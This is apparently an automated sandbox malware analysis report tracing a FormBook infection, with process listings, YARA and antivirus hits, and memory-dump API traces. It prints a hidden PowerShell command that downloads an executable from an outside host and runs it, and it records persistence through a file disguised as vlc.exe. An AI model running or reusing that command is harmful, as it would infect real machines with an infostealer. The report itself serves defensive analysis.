                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x12f0000
                                              File size:27110184 bytes
                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:11:38:01
                                              Start date:27/11/2020
                                              Path:C:\Windows\splwow64.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\splwow64.exe 12288
                                              Imagebase:0x7ff704f00000
                                              File size:130560 bytes
                                              MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:11:38:04
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
                                              Imagebase:0x7ff785e30000
                                              File size:447488 bytes
                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              General

                                              Start time:11:38:04
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
                                              Imagebase:0x7ff785e30000
                                              File size:447488 bytes
                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              General

                                              Start time:11:38:04
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6b2800000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:11:38:05
                                              Start date:27/11/2020
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6b2800000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:11:38:09
                                              Start date:27/11/2020
                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\oftmhayq.exe'
                                              Imagebase:0x7c0000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              General

                                              Start time:11:38:11
                                              Start date:27/11/2020
                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\oftmhayq.exe'
                                              Imagebase:0xfa0000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:11:38:34
                                              Start date:27/11/2020
                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\oftmhayq.exe
                                              Imagebase:0x870000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:11:38:35
                                              Start date:27/11/2020
                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\oftmhayq.exe
                                              Imagebase:0x8a0000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:11:38:37
                                              Start date:27/11/2020
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff714890000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:11:38:39
                                              Start date:27/11/2020
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
                                              Imagebase:0x70000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Disassembly

                                              Code Analysis


                                                Executed Functions

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.446361488.00007FFAF0E80000.00000040.00000001.sdmp, Offset: 00007FFAF0E80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                                • Instruction ID: 3a98f85368f0ca25ab79906adfc89d7ebb94667b872d6afc4458b55e37ef79ac
                                                • Opcode Fuzzy Hash: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                                • Instruction Fuzzy Hash: B501A77010CB0C4FD744EF0CE051AA6B3E0FB85320F10056EE58AC3291DB36E881CB45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.446888939.00007FFAF0EB0000.00000040.00000001.sdmp, Offset: 00007FFAF0EB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: m`_H
                                                • API String ID: 0-3858478043
                                                • Opcode ID: dc481bc74b6204669ec285899380fde3b2272ecc060297b44972ec806917081a
                                                • Instruction ID: 37ee81ec1a356ca50f0b755052444178d3ada9e66c92e35766e49e1eaa6eb7fd
                                                • Opcode Fuzzy Hash: dc481bc74b6204669ec285899380fde3b2272ecc060297b44972ec806917081a
                                                • Instruction Fuzzy Hash: FBF1B471A08A498FDB94EF5CC495AA977F1FF69300F14817AD44ED7396CA24EC45CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000015.00000002.446888939.00007FFAF0EB0000.00000040.00000001.sdmp, Offset: 00007FFAF0EB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 919925560bced310ebceab5c477c04356df1e2f0a44a7b85d49b0ed2af748044
                                                • Instruction ID: 05fff930fac60154ff67b68ad8b46b374c5f7f1583257f9cd48cba0c783b2840
                                                • Opcode Fuzzy Hash: 919925560bced310ebceab5c477c04356df1e2f0a44a7b85d49b0ed2af748044
                                                • Instruction Fuzzy Hash: EAF106B1A0DB864FE759D72CC8A55B53BE0EF57310B0881BFD09DCB2A3E919AC468741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000015.00000002.447125196.00007FFAF0F80000.00000040.00000001.sdmp, Offset: 00007FFAF0F80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ab76d3b73345fbb8abf2060d01abd064039611b60b2dc18cb1f1fe388c2e44f
                                                • Instruction ID: 6fba8d7ea41cfa72894f3a7f5954ac08e8db6a4ab0d1b9f97c5deeb2a1421996
                                                • Opcode Fuzzy Hash: 6ab76d3b73345fbb8abf2060d01abd064039611b60b2dc18cb1f1fe388c2e44f
                                                • Instruction Fuzzy Hash: 2091287290CA4D1FE795EB2C98495FB7BD1EF96320B0441BFE05DC7293EA14AC168391
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000015.00000002.446888939.00007FFAF0EB0000.00000040.00000001.sdmp, Offset: 00007FFAF0EB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79297f2283318b82cec0845d033bfaff7310d126e82ba6aee7f66c2ced5d0396
                                                • Instruction ID: ead3ed91ec183648a0987e851e9679b404066d378c252b80a1bbe80c21ccd557
                                                • Opcode Fuzzy Hash: 79297f2283318b82cec0845d033bfaff7310d126e82ba6aee7f66c2ced5d0396
                                                • Instruction Fuzzy Hash: AC31D57060CB494FEB49DA2CD8559713BE0EF6B35070440AFE48ECB2A3D919AC83C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000015.00000002.447125196.00007FFAF0F80000.00000040.00000001.sdmp, Offset: 00007FFAF0F80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb20bef45c7df8a923e3cc836e88b763ee93cc204697721dd9e791458832af6b
                                                • Instruction ID: 4fbb760b1a342c90a035cab7526777b7ca9942746a5eef01383cb18c7e55f5d4
                                                • Opcode Fuzzy Hash: eb20bef45c7df8a923e3cc836e88b763ee93cc204697721dd9e791458832af6b
                                                • Instruction Fuzzy Hash: A3112B71A0C68A0FE759EB6884515E57BD2EF59350B18C0FFC45DDB2D3C9189C158360
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000015.00000002.447125196.00007FFAF0F80000.00000040.00000001.sdmp, Offset: 00007FFAF0F80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000015.00000002.446888939.00007FFAF0EB0000.00000040.00000001.sdmp, Offset: 00007FFAF0EB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000015.00000002.446888939.00007FFAF0EB0000.00000040.00000001.sdmp, Offset: 00007FFAF0EB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (Uf$(Uf$(Uf$4/Xf$4/Xf$D!Qf$D!Qf$D!Qf$D!Qf$\Pf$\Pf$\Pf$t%Qf$t%Qf$#"
                                                • API String ID: 0-168133937
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: <Uf
                                                • API String ID: 0-3474588074
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 02A9B6F0
                                                • GetCurrentThread.KERNEL32 ref: 02A9B72D
                                                • GetCurrentProcess.KERNEL32 ref: 02A9B76A
                                                • GetCurrentThreadId.KERNEL32 ref: 02A9B7C3
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 02A9B6F0
                                                • GetCurrentThread.KERNEL32 ref: 02A9B72D
                                                • GetCurrentProcess.KERNEL32 ref: 02A9B76A
                                                • GetCurrentThreadId.KERNEL32 ref: 02A9B7C3
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02A998D6
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A9FE0A
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A9FE0A
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02A95411
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02A95411
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryA.KERNELBASE(?), ref: 073096E2
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryA.KERNELBASE(?), ref: 073096E2
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A9B93F
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A9B93F
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 10ebfb8d86a8d3b72867a854175c9b09cff35c98a5cb3a52e1f6333ba75a88d4
                                                • Instruction ID: ddbcfb1a8862244da8f411e85b97beabcc1cb7d518deb875a36547def947da0c
                                                • Opcode Fuzzy Hash: 10ebfb8d86a8d3b72867a854175c9b09cff35c98a5cb3a52e1f6333ba75a88d4
                                                • Instruction Fuzzy Hash: 6721E4B59002199FDB10CFAAD484ADEBBF8FB48324F14841AE914A3310D378A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A99951,00000800,00000000,00000000), ref: 02A99B62
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: d8044a83c941fb46f93266d209d7be197551a2833210196ef83a196e390b043d
                                                • Instruction ID: 656ef0fd3dcfd1180aa26095367c692aea36e80cf045c89887ee3e2006d30cc9
                                                • Opcode Fuzzy Hash: d8044a83c941fb46f93266d209d7be197551a2833210196ef83a196e390b043d
                                                • Instruction Fuzzy Hash: B611F4B69003099BDB10CF9AC484ADEFBF4AB88324F10852ED915A7610C779A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A99951,00000800,00000000,00000000), ref: 02A99B62
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 3fa70becc4af7749061a200d8de074a83fa52dfff93896fffcd3b1adda03e11d
                                                • Instruction ID: c6496a4bb46703371dd0d42d2b02d631b64a6af8ffb9b97f129d53b213e23b7e
                                                • Opcode Fuzzy Hash: 3fa70becc4af7749061a200d8de074a83fa52dfff93896fffcd3b1adda03e11d
                                                • Instruction Fuzzy Hash: 2B1103B69003499FCB10CFAAC484AEEFBF4AB88324F14852ED915A7610C779A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 2e0339b69be1aa5041d6e9dd9f766d43f4d555fdc5e22137f83a82156ca4f74f
                                                • Instruction ID: f5cee875ef564f2e8452d66a9b8a54594ce1a303d5eaa411641131537a268947
                                                • Opcode Fuzzy Hash: 2e0339b69be1aa5041d6e9dd9f766d43f4d555fdc5e22137f83a82156ca4f74f
                                                • Instruction Fuzzy Hash: 80113AB59003098BDB10DFAAC4447EEFBF4AB88324F14882DD519A7250C779A945CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 05BBFF0D
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 423c31d8fa51f135adaef6c72609b419b8ff2b7576976c37d96384b2566f202a
                                                • Instruction ID: 96f27c924318baba1c5782934f80f1fba6049939bd2e82c947b5c79a3d964bad
                                                • Opcode Fuzzy Hash: 423c31d8fa51f135adaef6c72609b419b8ff2b7576976c37d96384b2566f202a
                                                • Instruction Fuzzy Hash: 931113B58007499FDB10CF99C884BEEBBF8FB49324F10855AE825A3250C3B4A554CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02A998D6
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 08b87a4c921ce3cfcefebaae8a000e45fa798a28e05d35f4e8e5643e415cf5e1
                                                • Instruction ID: 612f90711ab8ab0904ea540be0778fbb7022fe0d28778d3b01503078c72e31a8
                                                • Opcode Fuzzy Hash: 08b87a4c921ce3cfcefebaae8a000e45fa798a28e05d35f4e8e5643e415cf5e1
                                                • Instruction Fuzzy Hash: 7611F0B5D002099BDB10CF9AC444ADEBBF4AB89324F14842ED829A7210C379A546CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 05BBFF0D
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 16afceb72b42eb15456cd0459a5b8d05849bba0a00f12fbbf236d1126785ab34
                                                • Instruction ID: 472286871cd055fc9ac788fa03eea0af946cff2e1c8d14aedd78d0b445b00cdc
                                                • Opcode Fuzzy Hash: 16afceb72b42eb15456cd0459a5b8d05849bba0a00f12fbbf236d1126785ab34
                                                • Instruction Fuzzy Hash: 4F1103B58003499FDB10CF99C884BEEBBF8FB49324F108419E815A3210C3B9A544CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: cw
                                                • API String ID: 0-1686128743
                                                • Opcode ID: 69e053a52ef954cb856302d6acfda75e3a711aeb474f1af652840eea07692ba0
                                                • Instruction ID: 7f3f02eeeb508c62fe67865d2d3b5f8482928c3a7c620a80bf62e546442e1114
                                                • Opcode Fuzzy Hash: 69e053a52ef954cb856302d6acfda75e3a711aeb474f1af652840eea07692ba0
                                                • Instruction Fuzzy Hash: 6B6171747002098FDB14DF69D558AAEBBF2EF89314F148469E505EB3A1DB70DC45CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
